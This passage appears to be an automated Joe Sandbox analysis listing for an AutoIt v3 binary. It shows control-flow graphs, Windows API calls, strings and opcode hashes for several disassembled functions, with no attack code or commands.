1668 7bcb54-7bcb86 1666->1668 1672 7bcba6-7bcbaf call 7bc235 1667->1672 1668->1665 1669->1667 1671 7bcb97-7bcb9f 1669->1671 1678 7bcc41-7bcc50 VariantClear 1670->1678 1682 7bcbd7-7bcbe0 1670->1682 1671->1672 1672->1678 1680 7bcc5a-7bcc5c 1678->1680 1681 7bcc52-7bcc55 call 7a1693 1678->1681 1680->1582 1681->1680 1684 7bcbe2-7bcbef 1682->1684 1685 7bcc38-7bcc3f 1684->1685 1686 7bcbf1-7bcbf8 1684->1686 1685->1678 1685->1684 1687 7bcbfa-7bcc0a 1686->1687 1688 7bcc26-7bcc2a 1686->1688 1687->1685 1691 7bcc0c-7bcc14 1687->1691 1689 7bcc2c-7bcc2e 1688->1689 1690 7bcc30 1688->1690 1692 7bcc32-7bcc33 call 7aa6f6 1689->1692 1690->1692 1691->1688 1693 7bcc16-7bcc1c 1691->1693 1692->1685 1693->1688 1694 7bcc1e-7bcc24 1693->1694 1694->1685 1694->1688
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: NULL Pointer assignment$Not an Object type
                                                                                                                                        • API String ID: 0-572801152
                                                                                                                                        • Opcode ID: 3e8503dbd2b428186515f81daf5b4288b083aee54731a2d1462c3e13779f5880
                                                                                                                                        • Instruction ID: 5d501bb5d6588d1a18eb4718e70d2efb2832347fe638c6ebbe3b5b3e96ea8c04
                                                                                                                                        • Opcode Fuzzy Hash: 3e8503dbd2b428186515f81daf5b4288b083aee54731a2d1462c3e13779f5880
                                                                                                                                        • Instruction Fuzzy Hash: 23E190B1A00219ABDF11DF64C885BEE77B9FF58354F14C029F945AB281D778AD41CBA0
                                                                                                                                        Function 007BBF80 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 264COMMON
                                                                                                                                        Download Yara Rule

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 1696 7bbf80-7bbfcd 1697 7bbfd9-7bbfe1 1696->1697 1698 7bbfd4 call 781970 1696->1698 1699 7bc21b-7bc21d 1697->1699 1700 7bbfe7-7bbfeb 1697->1700 1698->1697 1702 7bc21e-7bc21f 1699->1702 1700->1699 1701 7bbff1-7bbff6 1700->1701 1701->1699 1703 7bbffc-7bc00b call 7abe14 1701->1703 1704 7bc224-7bc226 1702->1704 1710 7bc158-7bc15c 1703->1710 1711 7bc011-7bc015 1703->1711 1706 7bc227 1704->1706 1707 7bc229 call 7bc235 1706->1707 1712 7bc22e-7bc232 1707->1712 1713 7bc15e-7bc160 1710->1713 1714 7bc16d 1710->1714 1715 7bc01b 1711->1715 1716 7bc017-7bc019 1711->1716 1717 7bc16f-7bc171 1713->1717 1714->1717 1718 7bc01d-7bc01f 1715->1718 1716->1718 1717->1702 1719 7bc177-7bc17b 1717->1719 1720 7bc033-7bc03e 1718->1720 1721 7bc021-7bc025 1718->1721 1723 7bc17d-7bc17f 1719->1723 1724 7bc181 1719->1724 1720->1706 1721->1720 1722 7bc027-7bc031 1721->1722 1722->1720 1725 7bc043-7bc05f 1722->1725 1726 7bc183-7bc186 1723->1726 1724->1726 1733 7bc061-7bc065 1725->1733 1734 7bc067-7bc081 1725->1734 1727 7bc188-7bc18e 1726->1727 1728 7bc193-7bc197 1726->1728 1727->1704 1729 7bc199-7bc19b 1728->1729 1730 7bc19d 1728->1730 1732 7bc19f-7bc1c9 VariantInit VariantClear 1729->1732 1730->1732 1742 7bc1cb-7bc1cd 1732->1742 1743 7bc1e6-7bc1ea 1732->1743 1733->1734 1735 7bc090-7bc0e5 call 77fa89 VariantInit call 781a00 1733->1735 1739 7bc089 1734->1739 1740 7bc083-7bc087 1734->1740 1758 7bc108-7bc10d 1735->1758 1759 7bc0e7-7bc0f1 1735->1759 1739->1735 1740->1735 1740->1739 1742->1743 1746 7bc1cf-7bc1e1 call 772570 1742->1746 1744 7bc1ec-7bc1ee 1743->1744 1745 7bc1f0-7bc1fe call 772570 1743->1745 1744->1745 1747 7bc201-7bc219 call 7aa6f6 VariantClear 1744->1747 1745->1747 1755 7bc0fb-7bc0fe 1746->1755 1747->1712 1755->1707 1762 7bc10f-7bc131 1758->1762 1763 7bc162-7bc16b 1758->1763 1760 7bc103-7bc106 1759->1760 1761 7bc0f3-7bc0fa 1759->1761 1760->1755 1761->1755 1766 7bc13b-7bc13d 1762->1766 1767 7bc133-7bc139 1762->1767 1763->1755 1768 7bc141-7bc157 call 7aa6f6 1766->1768 1767->1755 1768->1710
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                        • Opcode ID: 76aa3638224beef5ec2a52687b1cb98ebf1e855f1d9a9de31f9baec9038d9678
                                                                                                                                        • Instruction ID: 7b675fccc5ad7aea651ed1485b361c3eede93a2246b4b9cfa925165bf7e5ef54
                                                                                                                                        • Opcode Fuzzy Hash: 76aa3638224beef5ec2a52687b1cb98ebf1e855f1d9a9de31f9baec9038d9678
                                                                                                                                        • Instruction Fuzzy Hash: 4C916DB1A00219EBDB25DFA4CC88FEEB7B8EF45710F10C159E515AB281D7789945CBA0
                                                                                                                                        Function 00763DCB Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 258COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007634E2,?,00000001), ref: 00763FCD
                                                                                                                                        • _free.LIBCMT ref: 007D3C27
                                                                                                                                        • _free.LIBCMT ref: 007D3C6E
                                                                                                                                          • Part of subcall function 0076BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008222E8,?,00000000,?,00763E2E,?,00000000,?,007FDBF0,00000000,?), ref: 0076BE8B
                                                                                                                                          • Part of subcall function 0076BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00763E2E,?,00000000,?,007FDBF0,00000000,?,00000002), ref: 0076BEA7
                                                                                                                                          • Part of subcall function 0076BDF0: __wsplitpath.LIBCMT ref: 0076BF19
                                                                                                                                          • Part of subcall function 0076BDF0: _wcscpy.LIBCMT ref: 0076BF31
                                                                                                                                          • Part of subcall function 0076BDF0: _wcscat.LIBCMT ref: 0076BF46
                                                                                                                                          • Part of subcall function 0076BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0076BF56
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
                                                                                                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<v$G-v
                                                                                                                                        • API String ID: 1510338132-2904561404
                                                                                                                                        • Opcode ID: 0a000699d63dcdce96225ffaf667d8fd7779fdeec84065ea60cb46c5903061aa
                                                                                                                                        • Instruction ID: 992e037b7e4b17c9aea9486a8a64b50cc386850769f5c338a04647a7f3ec06af
                                                                                                                                        • Opcode Fuzzy Hash: 0a000699d63dcdce96225ffaf667d8fd7779fdeec84065ea60cb46c5903061aa
                                                                                                                                        • Instruction Fuzzy Hash: 4E918F71A00219EFCF04EFA4CC559EEB7B4BF49310F04452AF816AB291DB38AE05CB61
                                                                                                                                        Function 0077EB05 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0077EADA,?,?), ref: 0077EB27
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0077EADA,?,?), ref: 007D4B26
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0077EADA,?,?), ref: 007D4B65
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,0077EADA,?,?), ref: 007D4B94
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: QueryValue$CloseOpen
                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                                        • API String ID: 1586453840-614718249
                                                                                                                                        • Opcode ID: 2a38920107648fb217d18eb8d60e1bce8650eb6f13951ba700bc13631111fe8b
                                                                                                                                        • Instruction ID: 8651891cfc88af204f2db2344ac4729dc5f2594b560f2ea273181f6e942a8e38
                                                                                                                                        • Opcode Fuzzy Hash: 2a38920107648fb217d18eb8d60e1bce8650eb6f13951ba700bc13631111fe8b
                                                                                                                                        • Instruction Fuzzy Hash: 1A113DB1605108BFEB14DBA4CD8AEFE77BCEB04354F104059B506E6191EA799E05DB60
                                                                                                                                        Function 00762E9D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00762ECB
                                                                                                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00762EEC
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00762F00
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00762F09
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CreateShow
                                                                                                                                        • String ID: AutoIt v3$edit
                                                                                                                                        • API String ID: 1584632944-3779509399
                                                                                                                                        • Opcode ID: 4591e77c4a12b9419b291c951ff919a712ca0a13748021b294c8ad67d92985b5
                                                                                                                                        • Instruction ID: 88201282543ac634c0e02d2dc132e019451333c10deba2616799800b7cca4b8a
                                                                                                                                        • Opcode Fuzzy Hash: 4591e77c4a12b9419b291c951ff919a712ca0a13748021b294c8ad67d92985b5
                                                                                                                                        • Instruction Fuzzy Hash: 9FF030706406D47ADB3057576C4CE773E7EE7D6F10F11802EBA0496160C1650C92CAB4
                                                                                                                                        Function 007A6D6D Relevance: 7.6, APIs: 5, Instructions: 79COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00763B1E: _wcsncpy.LIBCMT ref: 00763B32
                                                                                                                                        • GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007A6DBA
                                                                                                                                        • GetLastError.KERNEL32 ref: 007A6DC5
                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6DD9
                                                                                                                                        • _wcsrchr.LIBCMT ref: 007A6DFB
                                                                                                                                          • Part of subcall function 007A6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6E31
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3633006590-0
                                                                                                                                        • Opcode ID: 2bd494a98aac21e102a9b50a8c064e73be010a7c5a3e1bf0107aa3e8a1ea7450
                                                                                                                                        • Instruction ID: 0e34d3f14d9a88c1f05f886ffb0480a26b9cb4fd4548c50708020d85da88097f
                                                                                                                                        • Opcode Fuzzy Hash: 2bd494a98aac21e102a9b50a8c064e73be010a7c5a3e1bf0107aa3e8a1ea7450
                                                                                                                                        • Instruction Fuzzy Hash: 03210265B45318DADF247774EC8EAEA33ACEF43760F280355E425C70D2EB29CE848A54
                                                                                                                                        Function 007B9122 Relevance: 7.6, APIs: 5, Instructions: 71networkCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007BACD3: inet_addr.WS2_32(00000000), ref: 007BACF5
                                                                                                                                        • socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 007B9160
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B916F
                                                                                                                                        • connect.WS2_32(00000000,?,00000010), ref: 007B918B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLastconnectinet_addrsocket
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3701255441-0
                                                                                                                                        • Opcode ID: d4632ee78b422a7e1fac11116a8c2c99b9825cae00e9c2ec7477618e3baa548e
                                                                                                                                        • Instruction ID: 45f13026b4ea7744c30b87f99a84cd3604f632147c895de93aa9689b48a3e4fb
                                                                                                                                        • Opcode Fuzzy Hash: d4632ee78b422a7e1fac11116a8c2c99b9825cae00e9c2ec7477618e3baa548e
                                                                                                                                        • Instruction Fuzzy Hash: 4D21D5312002149FCB10AF28CC89BAE77A9EF89320F048159FA16EB3D2CB78EC018751
                                                                                                                                        Function 00763A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • SHGetMalloc.SHELL32(1<v), ref: 00763A7D
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00763AD2
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00763A8F
                                                                                                                                          • Part of subcall function 00763B1E: _wcsncpy.LIBCMT ref: 00763B32
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                        • String ID: 1<v
                                                                                                                                        • API String ID: 3981382179-276691779
                                                                                                                                        • Opcode ID: 957cc7f400eaa192076b1c04a6a11806a8350a3126f3e3d4c9982a49a2d9179e
                                                                                                                                        • Instruction ID: 285929d4bbdabe805a4f68bfd576c095b54ccce2cc42a5961274224497fb8851
                                                                                                                                        • Opcode Fuzzy Hash: 957cc7f400eaa192076b1c04a6a11806a8350a3126f3e3d4c9982a49a2d9179e
                                                                                                                                        • Instruction Fuzzy Hash: BB219576B00114ABCB25DF95DC88DEE77BEEF88700B148099F90ADB250DB349E45CB94
                                                                                                                                        Function 0077C955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0077C948,SwapMouseButtons,00000004,?), ref: 0077C979
                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0077C948,SwapMouseButtons,00000004,?,?,?,?,0077BF22), ref: 0077C99A
                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,0077C948,SwapMouseButtons,00000004,?,?,?,?,0077BF22), ref: 0077C9BC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                        • Opcode ID: 196f500f3efaa22bd9e294cc673677267ed0b5a6b8be5980bfb26a54b75b5a66
                                                                                                                                        • Instruction ID: 615e5afb2b1787a881782d3ed11756c170a0f84bf51b80e66ad0665d6ffae097
                                                                                                                                        • Opcode Fuzzy Hash: 196f500f3efaa22bd9e294cc673677267ed0b5a6b8be5980bfb26a54b75b5a66
                                                                                                                                        • Instruction Fuzzy Hash: 28117C75511208FFDF628FA4DC84EEE77B8EF09780F00841AAA49E7210E235AE509B64
                                                                                                                                        Function 0079A8C8 Relevance: 6.3, APIs: 4, Instructions: 306COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 9a6707978b66f53f44efc29dd45cd301d212d587192e5c9457893a4c723030f6
                                                                                                                                        • Instruction ID: 574b9032a19440d1b55e6a8873c7f7d0ca0eb72e3a61576e43f563d14001d3e1
                                                                                                                                        • Opcode Fuzzy Hash: 9a6707978b66f53f44efc29dd45cd301d212d587192e5c9457893a4c723030f6
                                                                                                                                        • Instruction Fuzzy Hash: 78C19D75A0121AEFCF14CFA4D884EAEB7B5FF48310F108599E805AB251D738EE41DBA1
                                                                                                                                        Function 0076131C Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 159COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007616F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00761751
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0076159B
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00761612
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007D58F7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                        • String ID: '/z
                                                                                                                                        • API String ID: 458326420-1619994936
                                                                                                                                        • Opcode ID: e09d738e80b8d6927b41f482cb6f2f85fb0ab4c5ff507ecfdbb60964259213f2
